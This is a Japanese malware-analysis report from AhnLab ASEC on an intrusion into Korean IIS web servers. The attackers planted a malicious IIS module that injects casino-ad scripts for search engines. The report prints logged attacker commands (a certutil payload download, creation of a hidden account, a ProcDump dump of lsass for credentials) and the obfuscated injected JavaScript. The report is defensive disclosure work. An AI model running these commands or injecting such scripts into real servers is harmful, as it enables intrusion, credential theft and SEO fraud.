AhnLab SEcurity intelligence Center(ASEC)は、韓国国内の Web サーバーを対象に違法カジノ広告サイトへの接続を誘導するマルウェアが配布されている状況を確認した。攻撃者は、不適切に管理されている韓国国内の Windows IIS(Internet Information Services) Web サーバーに初期侵入後、Meterpreter バックドア、ポートフォワーディングツール、IIS モジュールマルウェアツールのインストール、および ProcDump を利用したサーバーの資格情報を窃取した。IIS モジュールとは、認証、HTTP レスポンス、ロギングなど、Web サーバーの拡張機能に対応するモジュールである。ISS C++ API あるいは ASP.NET 2.0 API を使用し、モジュールの開発が可能である。
(当社 AhnLab Smart Defense インフラのログ)
今回確認された IIS モジュールのマルウェアは、モジュールがインストールされた Web サーバーの HTTP ヘッダの文字列を監視し、特定条件に改ざんされたレスポンス値を送信して韓国国内および中国の検索ポータルサイトに、違法カジノサイトの広告を表示させる。そしてユーザーがそのリンクをクリックすると、違法カジノサイトへの接続を誘導する機能を実行する。
1. Meterpreter バックドア
攻撃者は、Web サーバーに Meterpreter バックドアをインストールする前に ipconfig、systeminfo など、多種の正常なユーティリティを実行していた。これは、攻撃者が IIS モジュールマルウェアのインストール前に攻撃対象の情報を収集するための目的と見られる。以下の[表1]は、タイムラインに応じて攻撃者が使用したコマンドである。
| コマンド実行時刻 | CMD 実行コマンド |
|---|---|
| 2024.04.09 03:43:12 | ipconfig |
| 2024.04.09 03:45:32 | systeminfo |
| 2024.04.09 03:45:49 | whoami |
| 2024.04.09 03:56:20 | powershell whoami |
| 2024.04.09 04:17:13 | hostname |
| 2024.04.09 04:17:21 | net1 user |
| 2024.04.09 04:17:42 | query user |
| 2024.04.09 04:22:10 | ping 45.154.12.215 |
| 2024.04.09 04:23:18 | curl |
| 2024.04.09 04:23:56 | certutil |
| 2024.04.09 04:28:20 | certutil -urlcache -split -f hxxp://m****k*****l[.]com/msf.txt |
| 2024.04.09 04:32:20 | %ALLUSERSPROFILE%\xx.txt |
Meterpreter バックドアは、攻撃者の IP と Port 番号を受け取って実行される。バックドアのコードを解析した結果、攻撃者サーバーとの通信を実行し、シェルコードを受信、および実行したものと推定される。
2. HTran (ポートフォワーディングツール)
Meterpreter バックドアのインストール後、攻撃者はさらに w3wp.exe プロセスを通じて HTran ユーティリティをインストールした。HTran は Github にソースコードが公開されているポートフォワーディングツールである。ポートフォワーディングとは、特定のポートから受け取ったデータを別のポートに伝達する機能である。攻撃者によって使用用途は様々だが、HTran を使用する事例の大半のケースにおいて、主に RDP ポートに遠隔通信を行うために使用すると知られている。
Meterpreter バックドア、HTran ポートフォワーディングツールをインストールしたあと、攻撃者は攻撃対象のシステムに対し、持続性の維持および拠点確保のために net コマンドで攻撃者アカウントを作成した。したがって、攻撃者は攻撃対象の Web サーバーの資格情報がなくても、攻撃者アカウントを作成したことにより、外部から容易に Web サーバーにアクセスができるようになる。
| コマンド実行時刻 | CMD 実行コマンド(アカウント追加) |
|---|---|
| 2024.04.09 05:04:51 | net user kr$ test123!@# /add |
攻撃対象への最初のアクセスから拠点の確保、および持続性の維持まで、Web サーバーを掌握するのには2時間もかからなかった。攻撃者は持続性維持後、IIS モジュールマルウェアを作成した。
3. IIS モジュールマルウェア
一般的に IIS モジュールは C:\Windows\System32\inetsrv パスに DLL 形式で存在し、IIS ワーカー(Worker)プロセスである w3wp.exe にロードされて動作する。w3wp.exe にロードされて動作するためには IIS C++ API を使用し、Export 関数に RegisterModule を含んでいる必要がある。そして、モジュールが動作すると当該 IIS Web サーバーがリクエストを受ける HTTP ヘッダに対する情報が RegisterModule に存在するイベントハンドラに渡される。この時、各ハンドラでは HTTP ヘッダのリクエストを処理することができる。発見されたマルウェアは複数のハンドラの値のうち OnSendResponse ハンドラにマルウェアを挿入し、IIS Web サーバーの SendResponse イベントが発生するたびに不正なハンドラ(sub_7FFB3DB7E840)が実行されるようにした。
OnSendResponse
-> Represents the method that will handle a SendResponse event, which occurs when IIS sends the response buffer.
インストールされたマルウェアは、当該 Web サーバーにリクエストされる HTTP ヘッダ情報のレスポンス値を操作する。受信した HTTP ヘッダの User-Agent、Referer などの値を参照し、Web ページの流入経路を確認して特定の検索ポータルサイトや関連する文字列を含んでいる場合、リクエストに対するレスポンス値として、正常な Web ページではなくオンライン違法カジノ関連のページにアクセスするようにした。
侵害された韓国国内の Web サイト情報を検索ポータルサイトで検索すると、以下の[図7]のようにオンライン違法カジノ関連のページが表示される。
検索ポータルサイトに Web サイトが表示されるためには、検索エンジンに Web サーバーが公開されている必要がある。検索エンジンが Web ページにアクセスして情報を収集する過程で、検索エンジンの HTTP ヘッダ情報が Web サーバーに伝達され、マルウェアはヘッダ値が特定のキーワードにマッチングする場合、検索エンジンでアクセスをリクエストするものと判断し、オンライン違法カジノページの Title、Keyword、Description のメタタグ情報を検索エンジンに渡す。
これにより、ポータルサイトに正常なサイトの検索ワードを入力したにもかかわらず、オンライン違法カジノ関連のページが表示される。以下の情報は、マルウェアが検証する検索エンジンとその他の主な機能に関する説明である。
[1] 特定のキーワードに一致する場合 「hxxps://ll.olacityviet.com/av.js」に接続するスクリプトのレスポンスを送信
User-Agent ヘッダに以下のキーワードを含んでいるかを確認
– naver|sogou|360|yisou|daum|google|coccoc
Referer ヘッダに以下のキーワードを含んでいるかを確認
– naver.com|so.com|sogou.com|sm.cn|daum.net|google|coccoc
[2] HTTP ヘッダの cookie 情報を窃取
以下の難読化されたスクリプトコードは、HTTP アクセスに対するレスポンス値であり、マルウェアが正常なレスポンス値に挿入するコードである。当該コードにより、ユーザーはオンライン違法賭博サイトのアドレスへ接続される。
<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
e = function(c) {
return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function(e) {
return r[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--)
if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ll.olacityviet|com|av|js|split'.split('|'), 0, {})) </script>復号化されたコードは以下の通りである。
document.write('');
現在はオンライン違法カジノ関連のページに接続できないが、レスポンススクリプトによって別の不正な振る舞いを実行することがあるため、特に注意が必要である。
4. ProcDump の悪用
攻撃者は、IIS モジュールマルウェアのインストール後 Procdump を利用して現在の Web サーバーの lsass.exe プロセスのメモリをダンプする振る舞いを実行した。これは、Mimikatz と類似した資格情報を窃取する振る舞いであり、Web サーバーと接続された他のサーバーへラテラルムーブメントを行うために使用したものと推定される。
| コマンド実行時刻 | CMD 実行コマンド |
|---|---|
| 2024.04.10 00:20:44 | %ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip |
5. 結論
攻撃者は、不適切に管理されている Windows Web サーバーを対象に初期侵入を試み、その後、拠点確保、持続性の維持、目標達成、内部でのラテラルムーブメントのための資格情報を取得した。現在は Shodan、FOFA などの検索エンジンで、世界中にインターネット接続されたデバイスの IP、ポート、使用中のサービス、OS 情報を容易に確認することができる。攻撃者も、このような検索エンジンを通じて攻撃対象を物色するものと推定される。したがって、企業のセキュリティ担当者は、攻撃対象領域管理(Attack Surface Management)を通して攻撃者にさらされる恐れのある資産を識別すると同時に、最新のセキュリティパッチなどの管理を持続的に行う必要がある。
ファイル検知
Meterpreter バックドア
– Trojan/Win.Meterpreter.C644410 (2024.04.09.02)
IIS モジュールマルウェア(x64)
– Trojan/Win.Generic.C5408521 (2023.04.10.02)
IIS モジュールマルウェア(x86)
– Trojan/Win.Backdoor.C578523 (2023.01.18.03)
IoC
MD5
Meterpreter バックドア
– d5312ab7f01fd74d399c392effdfe437
IIS モジュールマルウェア(x64)
– ebeb931a6dd91a227225f0ff92142f2b
IIS モジュールマルウェア(x86)
– 28dd72e322f6be382dac4fa9eb5cd09b
C&C アドレス
Meterpreter バックドア C&C アドレス
– 43.156.50[.]76
オンライン違法カジノ接続関連アドレス
– hxxp://ll.olacityviet[.]com
– hxxp://jsc.olacityviet[.]com
– hxxps://ll.olacityviet[.]com/av.js
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] […]